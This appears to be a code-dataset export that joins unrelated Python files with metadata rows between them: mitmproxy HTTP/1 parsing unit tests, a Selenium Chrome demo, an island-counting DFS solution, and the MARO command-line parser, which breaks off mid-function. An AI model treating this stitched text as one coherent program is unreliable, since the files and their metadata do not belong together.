rfile.first_byte_timestamp = 42
r = read_response_head(rfile)
assert r.status_code == 418
assert r.headers["Content-Length"] == "4"
assert r.content is None
assert rfile.reset_timestamps.called
assert r.timestamp_start == 42
assert rfile.read() == b"skip"
class TestReadBody:
def test_chunked(self):
rfile = BytesIO(b"3\r\nfoo\r\n0\r\n\r\nbar")
body = b"".join(read_body(rfile, None))
assert body == b"foo"
assert rfile.read() == b"bar"
def test_known_size(self):
rfile = BytesIO(b"foobar")
body = b"".join(read_body(rfile, 3))
assert body == b"foo"
assert rfile.read() == b"bar"
def test_known_size_limit(self):
rfile = BytesIO(b"foobar")
with pytest.raises(exceptions.HttpException):
b"".join(read_body(rfile, 3, 2))
def test_known_size_too_short(self):
rfile = BytesIO(b"foo")
with pytest.raises(exceptions.HttpException):
b"".join(read_body(rfile, 6))
def test_unknown_size(self):
rfile = BytesIO(b"foobar")
body = b"".join(read_body(rfile, -1))
assert body == b"foobar"
def test_unknown_size_limit(self):
rfile = BytesIO(b"foobar")
with pytest.raises(exceptions.HttpException):
b"".join(read_body(rfile, -1, 3))
def test_max_chunk_size(self):
rfile = BytesIO(b"123456")
assert list(read_body(rfile, -1, max_chunk_size=None)) == [b"123456"]
rfile = BytesIO(b"123456")
assert list(read_body(rfile, -1, max_chunk_size=1)) == [b"1", b"2", b"3", b"4", b"5", b"6"]
def test_connection_close():
headers = Headers()
assert connection_close(b"HTTP/1.0", headers)
assert not connection_close(b"HTTP/1.1", headers)
headers["connection"] = "keep-alive"
assert not connection_close(b"HTTP/1.1", headers)
headers["connection"] = "close"
assert connection_close(b"HTTP/1.1", headers)
headers["connection"] = "foobar"
assert connection_close(b"HTTP/1.0", headers)
assert not connection_close(b"HTTP/1.1", headers)
def test_expected_http_body_size():
# Expect: 100-continue
assert expected_http_body_size(
treq(headers=Headers(expect="100-continue", content_length="42")),
expect_continue_as_0=True
) == 0
# Expect: 100-continue
assert expected_http_body_size(
treq(headers=Headers(expect="100-continue", content_length="42")),
expect_continue_as_0=False
) == 42
# http://tools.ietf.org/html/rfc7230#section-3.3
assert expected_http_body_size(
treq(method=b"HEAD"),
tresp(headers=Headers(content_length="42"))
) == 0
assert expected_http_body_size(
treq(method=b"CONNECT"),
tresp()
) == 0
for code in (100, 204, 304):
assert expected_http_body_size(
treq(),
tresp(status_code=code)
) == 0
# chunked
assert expected_http_body_size(
treq(headers=Headers(transfer_encoding="chunked")),
) is None
# explicit length
for val in (b"foo", b"-7"):
with pytest.raises(exceptions.HttpSyntaxException):
expected_http_body_size(
treq(headers=Headers(content_length=val))
)
assert expected_http_body_size(
treq(headers=Headers(content_length="42"))
) == 42
# more than 1 content-length headers with same value
assert expected_http_body_size(
treq(headers=Headers([(b'content-length', b'42'), (b'content-length', b'42')]))
) == 42
# more than 1 content-length headers with conflicting value
with pytest.raises(exceptions.HttpSyntaxException):
expected_http_body_size(
treq(headers=Headers([(b'content-length', b'42'), (b'content-length', b'45')]))
)
# no length
assert expected_http_body_size(
treq(headers=Headers())
) == 0
assert expected_http_body_size(
treq(headers=Headers()), tresp(headers=Headers())
) == -1
def test_get_first_line():
rfile = BytesIO(b"foo\r\nbar")
assert _get_first_line(rfile) == b"foo"
rfile = BytesIO(b"\r\nfoo\r\nbar")
assert _get_first_line(rfile) == b"foo"
with pytest.raises(exceptions.HttpReadDisconnect):
rfile = BytesIO(b"")
_get_first_line(rfile)
with pytest.raises(exceptions.HttpReadDisconnect):
rfile = Mock()
rfile.readline.side_effect = exceptions.TcpDisconnect
_get_first_line(rfile)
def test_read_request_line():
def t(b):
return _read_request_line(BytesIO(b))
assert (t(b"GET / HTTP/1.1") ==
("", 0, b"GET", b"", b"", b"/", b"HTTP/1.1"))
assert (t(b"OPTIONS * HTTP/1.1") ==
("", 0, b"OPTIONS", b"", b"", b"*", b"HTTP/1.1"))
assert (t(b"CONNECT foo:42 HTTP/1.1") ==
("foo", 42, b"CONNECT", b"", b"foo:42", b"", b"HTTP/1.1"))
assert (t(b"GET http://foo:42/bar HTTP/1.1") ==
("foo", 42, b"GET", b"http", b"foo:42", b"/bar", b"HTTP/1.1"))
with pytest.raises(exceptions.HttpSyntaxException):
t(b"GET / WTF/1.1")
with pytest.raises(exceptions.HttpSyntaxException):
t(b"CONNECT example.com HTTP/1.1") # port missing
with pytest.raises(exceptions.HttpSyntaxException):
t(b"GET ws://example.com/ HTTP/1.1") # port missing
with pytest.raises(exceptions.HttpSyntaxException):
t(b"this is not http")
with pytest.raises(exceptions.HttpReadDisconnect):
t(b"")
def test_read_response_line():
def t(b):
return _read_response_line(BytesIO(b))
assert t(b"HTTP/1.1 200 OK") == (b"HTTP/1.1", 200, b"OK")
assert t(b"HTTP/1.1 200") == (b"HTTP/1.1", 200, b"")
# https://github.com/mitmproxy/mitmproxy/issues/784
assert t(b"HTTP/1.1 200 Non-Autoris\xc3\xa9") == (b"HTTP/1.1", 200, b"Non-Autoris\xc3\xa9")
with pytest.raises(exceptions.HttpSyntaxException):
assert t(b"HTTP/1.1")
with pytest.raises(exceptions.HttpSyntaxException):
t(b"HTTP/1.1 OK OK")
with pytest.raises(exceptions.HttpSyntaxException):
t(b"WTF/1.1 200 OK")
with pytest.raises(exceptions.HttpReadDisconnect):
t(b"")
def test_check_http_version():
_check_http_version(b"HTTP/0.9")
_check_http_version(b"HTTP/1.0")
_check_http_version(b"HTTP/1.1")
_check_http_version(b"HTTP/2.0")
with pytest.raises(exceptions.HttpSyntaxException):
_check_http_version(b"WTF/1.0")
with pytest.raises(exceptions.HttpSyntaxException):
_check_http_version(b"HTTP/1.10")
with pytest.raises(exceptions.HttpSyntaxException):
_check_http_version(b"HTTP/1.b")
class TestReadHeaders:
@staticmethod
def _read(data):
return _read_headers(BytesIO(data))
def test_read_simple(self):
data = (
b"Header: one\r\n"
b"Header2: two\r\n"
b"\r\n"
)
headers = self._read(data)
assert headers.fields == ((b"Header", b"one"), (b"Header2", b"two"))
def test_read_multi(self):
data = (
b"Header: one\r\n"
b"Header: two\r\n"
b"\r\n"
)
headers = self._read(data)
assert headers.fields == ((b"Header", b"one"), (b"Header", b"two"))
def test_read_continued(self):
data = (
b"Header: one\r\n"
b"\ttwo\r\n"
b"Header2: three\r\n"
b"\r\n"
)
headers = self._read(data)
assert headers.fields == ((b"Header", b"one\r\n two"), (b"Header2", b"three"))
def test_read_continued_err(self):
data = b"\tfoo: bar\r\n"
with pytest.raises(exceptions.HttpSyntaxException):
self._read(data)
def test_read_err(self):
data = b"foo"
with pytest.raises(exceptions.HttpSyntaxException):
self._read(data)
def test_read_empty_name(self):
data = b":foo"
with pytest.raises(exceptions.HttpSyntaxException):
self._read(data)
def test_read_empty_value(self):
data = b"bar:"
headers = self._read(data)
assert headers.fields == ((b"bar", b""),)
def test_read_chunked():
req = treq(content=None)
req.headers["Transfer-Encoding"] = "chunked"
data = b"1\r\na\r\n0\r\n"
with pytest.raises(exceptions.HttpSyntaxException):
b"".join(_read_chunked(BytesIO(data)))
data = b"1\r\na\r\n0\r\n\r\n"
assert b"".join(_read_chunked(BytesIO(data))) == b"a"
data = b"\r\n\r\n1\r\na\r\n1\r\nb\r\n0\r\n\r\n"
assert b"".join(_read_chunked(BytesIO(data))) == b"ab"
data = b"\r\n"
with pytest.raises(Exception, match="closed prematurely"):
b"".join(_read_chunked(BytesIO(data)))
data = b"1\r\nfoo"
with pytest.raises(Exception, match="Malformed chunked body"):
b"".join(_read_chunked(BytesIO(data)))
data = b"foo\r\nfoo"
with pytest.raises(exceptions.HttpSyntaxException):
b"".join(_read_chunked(BytesIO(data)))
data = b"5\r\naaaaa\r\n0\r\n\r\n"
with pytest.raises(Exception, match="too large"):
b"".join(_read_chunked(BytesIO(data), limit=2))
| 31.259162
| 99
| 0.621891
|
0127bac68bf223b1e5be6bd1bf11a7358abb9f96
| 138
|
py
|
Python
|
code2/day09/demo02.py
|
picktsh/python
|
0f758dcdf9eee3580d8f6e2241ef557b6320ef54
|
[
"MIT"
] | 1
|
2019-12-31T16:44:06.000Z
|
2019-12-31T16:44:06.000Z
|
code2/day09/demo02.py
|
picktsh/python
|
0f758dcdf9eee3580d8f6e2241ef557b6320ef54
|
[
"MIT"
] | null | null | null |
code2/day09/demo02.py
|
picktsh/python
|
0f758dcdf9eee3580d8f6e2241ef557b6320ef54
|
[
"MIT"
] | 1
|
2022-01-13T10:32:22.000Z
|
2022-01-13T10:32:22.000Z
|
# How to set up a local Chrome browser
from selenium import webdriver  # import the webdriver module from the selenium library
driver = webdriver.Chrome()  # set the engine to Chrome and actually open a Chrome browser
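# --- Continuation sketch (not part of the original demo) ---------------------
# The lines below only illustrate what is usually done next with the driver;
# the URL is just an example target.
driver.get('https://example.com')   # navigate the opened browser to a page
print(driver.title)                 # read the page title, e.g. "Example Domain"
driver.quit()                       # close the browser and end the session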
| 27.6
| 59
| 0.826087
|
f333190780725382970e6c630284406a7c286879
| 749
|
py
|
Python
|
solution/4963(섬의 개수).py
|
OMEGA-Y/Baekjoon-sol
|
9eaa441e482a0967fb60a9ea1d1373be00272c34
|
[
"Apache-2.0"
] | null | null | null |
solution/4963(섬의 개수).py
|
OMEGA-Y/Baekjoon-sol
|
9eaa441e482a0967fb60a9ea1d1373be00272c34
|
[
"Apache-2.0"
] | null | null | null |
solution/4963(섬의 개수).py
|
OMEGA-Y/Baekjoon-sol
|
9eaa441e482a0967fb60a9ea1d1373be00272c34
|
[
"Apache-2.0"
] | null | null | null |
# BOJ 4963 (number of islands): count the connected groups of 1-cells in each
# grid; diagonal neighbours also count as connected (8-directional DFS).
import sys
input = sys.stdin.readline
sys.setrecursionlimit(10**6)
def dfs(matrix, n, m, count, x, y):
    # Mark the current cell as visited by zeroing it, then recurse into every
    # neighbouring land cell (== 1) in the eight surrounding directions.
    matrix[x][y] = 0
    dx = [-1,1,0,0,-1,-1,1,1]
    dy = [0,0,-1,1,-1,1,-1,1]
    for i in range(8):
        nx = x+dx[i]
        ny = y+dy[i]
        if nx >= 0 and nx < m and ny >= 0 and ny < n:
            if matrix[nx][ny] == 1:
                count = dfs(matrix, n, m, count+1, nx, ny)
    return count
while True:
n,m = map(int,input().split())
if n == 0:
break
matrix = [list(map(int,input().rstrip().split())) for _ in range(m)]
cnt = 0
for i in range(m):
for j in range(n):
if matrix[i][j] == 1:
dfs(matrix, n, m, 1, i, j)
cnt += 1
print(cnt)
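# Worked example (hypothetical input, not an official judge case):
#   2 2
#   1 0
#   0 1
#   0 0
# The two land cells only touch diagonally, but diagonals count as connected
# here (8 directions), so they form one island and the program prints 1.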
| 22.69697
| 72
| 0.460614
|
d4b8aabd6c6ffe4d18bf15321ab26ad80f1e4da0
| 39,041
|
py
|
Python
|
maro/cli/maro.py
|
yangboz/maro
|
0973783e55ca07bf8e177910c9d47854117a4ea8
|
[
"MIT"
] | 598
|
2020-09-23T00:50:22.000Z
|
2022-03-31T08:12:54.000Z
|
maro/cli/maro.py
|
gx9702/maro
|
38c796f0a7ed1e0f64c299d96c6e0df032401fa9
|
[
"MIT"
] | 235
|
2020-09-22T10:20:48.000Z
|
2022-03-31T02:10:03.000Z
|
maro/cli/maro.py
|
gx9702/maro
|
38c796f0a7ed1e0f64c299d96c6e0df032401fa9
|
[
"MIT"
] | 116
|
2020-09-22T09:19:04.000Z
|
2022-02-12T05:04:07.000Z
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import logging
import traceback
from argparse import Namespace
from copy import deepcopy
import maro.cli.utils.examples as CliExamples
from maro import __version__
from maro.cli.utils.params import GlobalParams
from maro.cli.utils.parser import ArgumentParser
from maro.utils.exception.cli_exception import CliError, CommandNotFoundError
from maro.utils.logger import CliLogger
MARO_BANNER = """
 __  __    _    ____   ___
|  \/  |  / \  |  _ \ / _ \\
| |\/| | / _ \ | |_) | | | |
| |  | |/ ___ \|  _ <| |_| |
|_|  |_/_/   \_\_| \_\\___/
Welcome to the MARO CLI
Use `maro --version` to get the current version.
"""
logger = CliLogger(name=__name__)
def main():
global_parser = ArgumentParser()
global_parser.add_argument("--debug", action='store_true', help="Enable debug mode")
global_parser.add_argument("-h", "--help", action='store_true', help="Show this message and exit")
parser = ArgumentParser(prog='maro', description=MARO_BANNER, parents=[global_parser])
parser.set_defaults(func=_help_func(parser=parser))
parser.add_argument('--version', action='store_true', help='Get version info')
subparsers = parser.add_subparsers()
# maro env
parser_env = subparsers.add_parser(
'env',
help=(
            'Get all environment-related information, '
            'such as the supported scenarios and topologies. \n'
            'It can also generate data for scenarios '
            'that have external data dependencies.'
),
parents=[global_parser]
)
parser_env.set_defaults(func=_help_func(parser=parser_env))
load_parser_env(parser_env, global_parser)
# maro data
parser_data = subparsers.add_parser(
'data',
help="Data processing tools for MARO binary format.",
parents=[global_parser]
)
parser_data.set_defaults(func=_help_func(parser=parser_data))
load_parser_data(prev_parser=parser_data, global_parser=global_parser)
# maro meta
parser_meta = subparsers.add_parser(
'meta',
help="Manage the meta files for MARO.",
parents=[global_parser]
)
parser_meta.set_defaults(func=_help_func(parser=parser_meta))
load_parser_meta(prev_parser=parser_meta, global_parser=global_parser)
# maro grass
parser_grass = subparsers.add_parser(
"grass",
help="Manage distributed cluster with native virtual machines (for development only).",
parents=[global_parser]
)
parser_grass.set_defaults(func=_help_func(parser=parser_grass))
load_parser_grass(prev_parser=parser_grass, global_parser=global_parser)
# maro k8s
parser_k8s = subparsers.add_parser(
"k8s",
help="Manage distributed cluster with Kubernetes.",
parents=[global_parser]
)
parser_k8s.set_defaults(func=_help_func(parser=parser_k8s))
load_parser_k8s(prev_parser=parser_k8s, global_parser=global_parser)
# maro inspector
parser_inspector = subparsers.add_parser(
'inspector',
help=("Display visualization of experimental data."),
parents=[global_parser]
)
parser_inspector.set_defaults(func=_help_func(parser=parser_inspector))
load_parser_inspector(parser_inspector, global_parser)
# maro process
parser_process = subparsers.add_parser(
"process",
help="Run application by mulit-process to simulate distributed mode."
)
parser_process.set_defaults(func=_help_func(parser=parser_process))
load_parser_process(prev_parser=parser_process, global_parser=global_parser)
# maro project
parser_project = subparsers.add_parser(
"project",
help="Manage maro projects."
)
    parser_project.set_defaults(func=_help_func(parser=parser_project))
load_parser_project(prev_parser=parser_project, global_parser=global_parser)
# maro admin
parser_admin = subparsers.add_parser(
"admin",
help="Manage maro admin tools."
)
parser_admin.set_defaults(func=_help_func(parser=parser_admin))
load_parser_admin(prev_parser=parser_admin, global_parser=global_parser)
args = None
try:
# Get args and parse global arguments
args = parser.parse_args()
if args.debug:
GlobalParams.LOG_LEVEL = logging.DEBUG
else:
GlobalParams.LOG_LEVEL = logging.INFO
if args.version:
logger.info(f'{__version__}')
return
actual_args = _get_actual_args(namespace=args)
# WARNING: We cannot assign any argument like 'func' in the CLI
args.func(**actual_args)
except CommandNotFoundError as e:
logger.error_red(f"{e.__class__.__name__}: {e.get_message()}")
logger.info(f"{e.usage}")
except CliError as e:
if args is None or args.debug:
logger.error_red(f"{e.__class__.__name__}: {e.get_message()}\n{traceback.format_exc()}")
else:
logger.error_red(f"{e.__class__.__name__}: {e.get_message()}")
def load_parser_process(prev_parser: ArgumentParser, global_parser: ArgumentParser) -> None:
subparsers = prev_parser.add_subparsers()
# maro process create
from maro.cli.process.create import create
parser_setup = subparsers.add_parser(
"create",
help="Create local process environment.",
examples=CliExamples.MARO_PROCESS_SETUP,
parents=[global_parser]
)
parser_setup.add_argument(
'deployment_path',
help='Path of the local process setting deployment.',
nargs='?',
default=None)
parser_setup.set_defaults(func=create)
# maro process delete
from maro.cli.process.delete import delete
parser_setup = subparsers.add_parser(
"delete",
help="Delete the local process environment. Including closing agents and maro Redis.",
parents=[global_parser]
)
parser_setup.set_defaults(func=delete)
# maro process job
parser_job = subparsers.add_parser(
"job",
help="Manage jobs",
parents=[global_parser]
)
parser_job.set_defaults(func=_help_func(parser=parser_job))
parser_job_subparsers = parser_job.add_subparsers()
# maro process job start
from maro.cli.process.job import start_job
parser_job_start = parser_job_subparsers.add_parser(
'start',
help='Start a training job',
examples=CliExamples.MARO_PROCESS_JOB_START,
parents=[global_parser]
)
parser_job_start.add_argument(
'deployment_path', help='Path of the job deployment')
parser_job_start.set_defaults(func=start_job)
# maro process job stop
from maro.cli.process.job import stop_job
parser_job_stop = parser_job_subparsers.add_parser(
'stop',
help='Stop a training job',
examples=CliExamples.MARO_PROCESS_JOB_STOP,
parents=[global_parser]
)
parser_job_stop.add_argument(
'job_name', help='Name of the job')
parser_job_stop.set_defaults(func=stop_job)
# maro process job delete
from maro.cli.process.job import delete_job
parser_job_delete = parser_job_subparsers.add_parser(
'delete',
help='delete a stopped job',
examples=CliExamples.MARO_PROCESS_JOB_DELETE,
parents=[global_parser]
)
parser_job_delete.add_argument(
'job_name', help='Name of the job or the schedule')
parser_job_delete.set_defaults(func=delete_job)
# maro process job list
from maro.cli.process.job import list_jobs
parser_job_list = parser_job_subparsers.add_parser(
'list',
help='List all jobs',
examples=CliExamples.MARO_PROCESS_JOB_LIST,
parents=[global_parser]
)
parser_job_list.set_defaults(func=list_jobs)
# maro process job logs
from maro.cli.process.job import get_job_logs
parser_job_logs = parser_job_subparsers.add_parser(
'logs',
help='Get logs of the job',
examples=CliExamples.MARO_PROCESS_JOB_LOGS,
parents=[global_parser]
)
parser_job_logs.add_argument(
'job_name', help='Name of the job')
parser_job_logs.set_defaults(func=get_job_logs)
# maro process schedule
parser_schedule = subparsers.add_parser(
'schedule',
help='Manage schedules',
parents=[global_parser]
)
parser_schedule.set_defaults(func=_help_func(parser=parser_schedule))
parser_schedule_subparsers = parser_schedule.add_subparsers()
# maro process schedule start
from maro.cli.process.schedule import start_schedule
parser_schedule_start = parser_schedule_subparsers.add_parser(
'start',
help='Start a schedule',
examples=CliExamples.MARO_PROCESS_SCHEDULE_START,
parents=[global_parser]
)
parser_schedule_start.add_argument(
'deployment_path', help='Path of the schedule deployment')
parser_schedule_start.set_defaults(func=start_schedule)
# maro process schedule stop
from maro.cli.process.schedule import stop_schedule
parser_schedule_stop = parser_schedule_subparsers.add_parser(
'stop',
help='Stop a schedule',
examples=CliExamples.MARO_PROCESS_SCHEDULE_STOP,
parents=[global_parser]
)
parser_schedule_stop.add_argument(
'schedule_name', help='Name of the schedule')
parser_schedule_stop.set_defaults(func=stop_schedule)
# maro process template
from maro.cli.process.template import template
parser_template = subparsers.add_parser(
"template",
help="Get deployment templates",
examples=CliExamples.MARO_PROCESS_TEMPLATE,
parents=[global_parser]
)
parser_template.add_argument(
"--setting_deploy",
action="store_true",
help="Get environment setting templates"
)
parser_template.add_argument(
"export_path",
default="./",
nargs='?',
help="Path of the export directory")
parser_template.set_defaults(func=template)
def load_parser_grass(prev_parser: ArgumentParser, global_parser: ArgumentParser) -> None:
subparsers = prev_parser.add_subparsers()
# maro grass create
from maro.cli.grass.create import create
parser_create = subparsers.add_parser(
"create",
help="Create cluster",
examples=CliExamples.MARO_GRASS_CREATE,
parents=[global_parser]
)
parser_create.add_argument("deployment_path", help="Path of the create deployment")
parser_create.set_defaults(func=create)
# maro grass delete
from maro.cli.grass.delete import delete
parser_delete = subparsers.add_parser(
"delete",
help="Delete cluster",
examples=CliExamples.MARO_GRASS_DELETE,
parents=[global_parser]
)
parser_delete.add_argument("cluster_name", help="Name of the cluster")
parser_delete.set_defaults(func=delete)
# maro grass node
parser_node = subparsers.add_parser(
"node",
help="Manage nodes of the cluster",
parents=[global_parser]
)
parser_node.set_defaults(func=_help_func(parser=parser_node))
parser_node_subparsers = parser_node.add_subparsers()
# maro grass node scale
from maro.cli.grass.node import scale_node
parser_node_scale = parser_node_subparsers.add_parser(
"scale",
help="Scale up or scale down nodes to target number",
examples=CliExamples.MARO_GRASS_NODE_SCALE,
parents=[global_parser]
)
parser_node_scale.add_argument("cluster_name", help="Name of the cluster")
parser_node_scale.add_argument("node_size", help="Azure VM size")
parser_node_scale.add_argument("replicas", type=int, help="Target number of the nodes in the specific node_size")
parser_node_scale.set_defaults(func=scale_node)
# maro grass node start
from maro.cli.grass.node import start_node
parser_node_start = parser_node_subparsers.add_parser(
"start",
help="Start nodes",
examples=CliExamples.MARO_GRASS_NODE_START,
parents=[global_parser]
)
parser_node_start.add_argument("cluster_name", help="Name of the cluster")
parser_node_start.add_argument("node_size", help="Azure VM size")
parser_node_start.add_argument(
"replicas",
type=int,
help="Target number of the nodes need to be started in the specific node_size"
)
parser_node_start.set_defaults(func=start_node)
# maro grass node stop
from maro.cli.grass.node import stop_node
parser_node_stop = parser_node_subparsers.add_parser(
"stop",
help="Stop nodes",
examples=CliExamples.MARO_GRASS_NODE_STOP,
parents=[global_parser]
)
parser_node_stop.add_argument("cluster_name", help="Name of the cluster")
parser_node_stop.add_argument("node_size", help="Azure VM size")
parser_node_stop.add_argument(
"replicas",
type=int,
help="Target number of the nodes need to be stopped in the specific node_size"
)
parser_node_stop.set_defaults(func=stop_node)
# maro grass node list
from maro.cli.grass.node import list_node
parser_node_list = parser_node_subparsers.add_parser(
"list",
help="List details of nodes",
examples=CliExamples.MARO_GRASS_NODE_LIST,
parents=[global_parser]
)
parser_node_list.add_argument("cluster_name", help="Name of the cluster")
parser_node_list.set_defaults(func=list_node)
# maro grass node join
from maro.cli.grass.node import join_cluster
parser_node_join = parser_node_subparsers.add_parser(
"join",
help="Let one node join in a cluster in on-premises mode.",
examples=CliExamples.MARO_GRASS_NODE_JOIN,
parents=[global_parser]
)
parser_node_join.add_argument("deployment_path", help="The node join description file path.")
parser_node_join.set_defaults(func=join_cluster)
# maro grass node leave
from maro.cli.grass.node import leave_cluster
parser_node_leave = parser_node_subparsers.add_parser(
"leave",
help="make node leave to cluster",
examples=CliExamples.MARO_GRASS_NODE_LEAVE,
parents=[global_parser]
)
parser_node_leave.add_argument(
"deployment_path",
nargs="?",
default={},
help="The node join description file path."
)
parser_node_leave.set_defaults(func=leave_cluster)
# maro grass image
parser_image = subparsers.add_parser(
"image",
help="Manage images of the cluster",
parents=[global_parser]
)
parser_image.set_defaults(func=_help_func(parser=parser_image))
parser_image_subparsers = parser_image.add_subparsers()
# maro grass image push
from maro.cli.grass.image import push_image
parser_image_push = parser_image_subparsers.add_parser(
"push",
help="Push a local image to the cluster",
examples=CliExamples.MARO_GRASS_IMAGE_PUSH,
parents=[global_parser]
)
parser_image_push.add_argument("cluster_name", help="Name of the cluster")
parser_image_push.add_argument("--image-name", help="Name of the local image")
parser_image_push.add_argument("--image-path", help="Path of the local tar file")
parser_image_push.add_argument(
"--remote-context-path",
help="Absolute path of the image context in the user data storage of the cluster"
)
parser_image_push.add_argument("--remote-image-name", help="Name of the image")
parser_image_push.set_defaults(func=push_image)
# maro grass data
parser_data = subparsers.add_parser(
"data",
help="Manage user data storage in the cluster",
parents=[global_parser]
)
parser_data.set_defaults(func=_help_func(parser=parser_data))
parser_data_subparsers = parser_data.add_subparsers()
# maro grass data push
from maro.cli.grass.data import push_data
parser_data_push = parser_data_subparsers.add_parser(
"push",
help="Push the local data to the remote directory",
examples=CliExamples.MARO_GRASS_DATA_PUSH,
parents=[global_parser]
)
parser_data_push.add_argument("cluster_name", help="Name of the cluster")
parser_data_push.add_argument("local_path", help="Path of the local file")
parser_data_push.add_argument("remote_path", help="Path of the directory in the cluster data storage")
parser_data_push.set_defaults(func=push_data)
# maro grass data pull
from maro.cli.grass.data import pull_data
parser_data_pull = parser_data_subparsers.add_parser(
"pull",
help="Pull the remote data to the local directory",
examples=CliExamples.MARO_GRASS_DATA_PULL,
parents=[global_parser]
)
parser_data_pull.add_argument("cluster_name", help="Name of the cluster")
parser_data_pull.add_argument("remote_path", help="Path of the file in the cluster data storage")
parser_data_pull.add_argument("local_path", help="Path of the directory in the local")
parser_data_pull.set_defaults(func=pull_data)
# maro grass job
parser_job = subparsers.add_parser(
"job",
help="Manage jobs",
parents=[global_parser]
)
parser_job.set_defaults(func=_help_func(parser=parser_job))
parser_job_subparsers = parser_job.add_subparsers()
# maro grass job start
from maro.cli.grass.job import start_job
parser_job_start = parser_job_subparsers.add_parser(
"start",
help="Start a training job",
examples=CliExamples.MARO_GRASS_JOB_START,
parents=[global_parser]
)
parser_job_start.add_argument("cluster_name", help="Name of the cluster")
parser_job_start.add_argument("deployment_path", help="Path of the job deployment")
parser_job_start.set_defaults(func=start_job)
# maro grass job stop
from maro.cli.grass.job import stop_job
parser_job_stop = parser_job_subparsers.add_parser(
"stop",
help="Stop a training job",
examples=CliExamples.MARO_GRASS_JOB_STOP,
parents=[global_parser]
)
parser_job_stop.add_argument("cluster_name", help="Name of the cluster")
parser_job_stop.add_argument("job_name", help="Name of the job")
parser_job_stop.set_defaults(func=stop_job)
# maro grass job list
from maro.cli.grass.job import list_job
parser_job_list = parser_job_subparsers.add_parser(
"list",
help="List details of jobs",
examples=CliExamples.MARO_GRASS_JOB_LIST,
parents=[global_parser]
)
parser_job_list.add_argument("cluster_name", help="Name of the cluster")
parser_job_list.set_defaults(func=list_job)
# maro grass job logs
from maro.cli.grass.job import get_job_logs
parser_job_logs = parser_job_subparsers.add_parser(
"logs",
help="Get logs of the job",
examples=CliExamples.MARO_GRASS_JOB_LOGS,
parents=[global_parser]
)
parser_job_logs.add_argument("cluster_name", help="Name of the cluster")
parser_job_logs.add_argument("job_name", help="Name of the job")
parser_job_logs.set_defaults(func=get_job_logs)
# maro grass schedule
parser_schedule = subparsers.add_parser(
"schedule",
help="Manage schedules",
parents=[global_parser]
)
parser_schedule.set_defaults(func=_help_func(parser=parser_schedule))
parser_schedule_subparsers = parser_schedule.add_subparsers()
# maro grass schedule start
from maro.cli.grass.schedule import start_schedule
parser_schedule_start = parser_schedule_subparsers.add_parser(
"start",
help="Start a schedule",
examples=CliExamples.MARO_GRASS_SCHEDULE_START,
parents=[global_parser]
)
parser_schedule_start.add_argument("cluster_name", help="Name of the cluster")
parser_schedule_start.add_argument("deployment_path", help="Path of the schedule deployment")
parser_schedule_start.set_defaults(func=start_schedule)
# maro grass schedule stop
from maro.cli.grass.schedule import stop_schedule
parser_schedule_stop = parser_schedule_subparsers.add_parser(
"stop",
help="Stop a schedule",
examples=CliExamples.MARO_GRASS_SCHEDULE_STOP,
parents=[global_parser]
)
parser_schedule_stop.add_argument("cluster_name", help="Name of the cluster")
parser_schedule_stop.add_argument("schedule_name", help="Name of the schedule")
parser_schedule_stop.set_defaults(func=stop_schedule)
# maro grass clean
from maro.cli.grass.clean import clean
parser_clean = subparsers.add_parser(
"clean",
help="Clean cluster",
examples=CliExamples.MARO_GRASS_CLEAN,
parents=[global_parser]
)
parser_clean.add_argument("cluster_name", help="Name of the cluster")
parser_clean.set_defaults(func=clean)
# maro grass status
from maro.cli.grass.status import status
parser_status = subparsers.add_parser(
"status",
help="Get status of the cluster",
examples=CliExamples.MARO_GRASS_STATUS,
parents=[global_parser]
)
parser_status.add_argument("cluster_name", help="Name of the cluster")
parser_status.add_argument("resource_name", help="Name of the resource")
parser_status.set_defaults(func=status)
# maro grass template
from maro.cli.grass.template import template
parser_clean = subparsers.add_parser(
"template",
help="Get deployment templates",
examples=CliExamples.MARO_GRASS_TEMPLATES,
parents=[global_parser]
)
parser_clean.add_argument("export_path", default="./", help="Path of the export directory")
parser_clean.set_defaults(func=template)
def load_parser_env(prev_parser: ArgumentParser, global_parser) -> None:
from maro.cli.envs.list_available import list_scenarios, list_topologies
subparsers = prev_parser.add_subparsers()
# maro env list
parser_list = subparsers.add_parser(
'list',
help='List name of built-in scenarios.',
parents=[global_parser]
)
parser_list.set_defaults(func=list_scenarios)
# maro env topologies --scenario name
parser_topo = subparsers.add_parser(
'topology',
help='Get built-in topologies for specified scenario.',
parents=[global_parser]
)
parser_topo.add_argument(
'-s', '--scenario',
required=True,
help='Scenario name to show topologies.'
)
parser_topo.set_defaults(func=list_topologies)
# MARO env data command
parser_env_data = subparsers.add_parser(
'data',
help="Generate predefined scenario related data.",
parents=[global_parser]
)
parser_env_data.set_defaults(func=_help_func(parser=parser_env_data))
# Generate data for a specific scenario and topology.
from maro.cli.data_pipeline.data_process import generate, list_env
from maro.simulator.utils.common import get_scenarios
data_subparsers = parser_env_data.add_subparsers()
generate_cmd_parser = data_subparsers.add_parser(
"generate",
help="Generate data for a specific scenario and topology.",
parents=[global_parser])
generate_cmd_parser.add_argument(
"-s", "--scenario",
required=True,
choices=get_scenarios(),
help="Scenario of environment.")
generate_cmd_parser.add_argument(
"-t", "--topology",
required=True,
help="Topology of scenario.")
generate_cmd_parser.add_argument(
"-f", "--forced",
action="store_true",
help="Re-generate forcibly.")
generate_cmd_parser.set_defaults(func=generate)
list_cmd_parser = data_subparsers.add_parser(
"list",
help="List predefined environments that need generate data extraly.",
parents=[global_parser])
list_cmd_parser.set_defaults(func=list_env)
def load_parser_k8s(prev_parser: ArgumentParser, global_parser: ArgumentParser) -> None:
subparsers = prev_parser.add_subparsers()
# maro k8s create
from maro.cli.k8s.create import create
parser_create = subparsers.add_parser(
"create",
help="Create cluster",
examples=CliExamples.MARO_K8S_CREATE,
parents=[global_parser]
)
parser_create.add_argument("deployment_path", help="Path of the create deployment")
parser_create.set_defaults(func=create)
# maro k8s delete
from maro.cli.k8s.delete import delete
parser_create = subparsers.add_parser(
"delete",
help="Delete cluster",
examples=CliExamples.MARO_K8S_DELETE,
parents=[global_parser]
)
parser_create.add_argument("cluster_name", help="Name of the cluster")
parser_create.set_defaults(func=delete)
# maro k8s node
parser_node = subparsers.add_parser(
"node",
help="Manage nodes of the cluster",
parents=[global_parser]
)
parser_node.set_defaults(func=_help_func(parser=parser_node))
parser_node_subparsers = parser_node.add_subparsers()
# maro k8s node scale
from maro.cli.k8s.node import scale_node
parser_node_scale = parser_node_subparsers.add_parser(
"scale",
help="Scale up or scale down nodes to target number",
examples=CliExamples.MARO_K8S_NODE_SCALE,
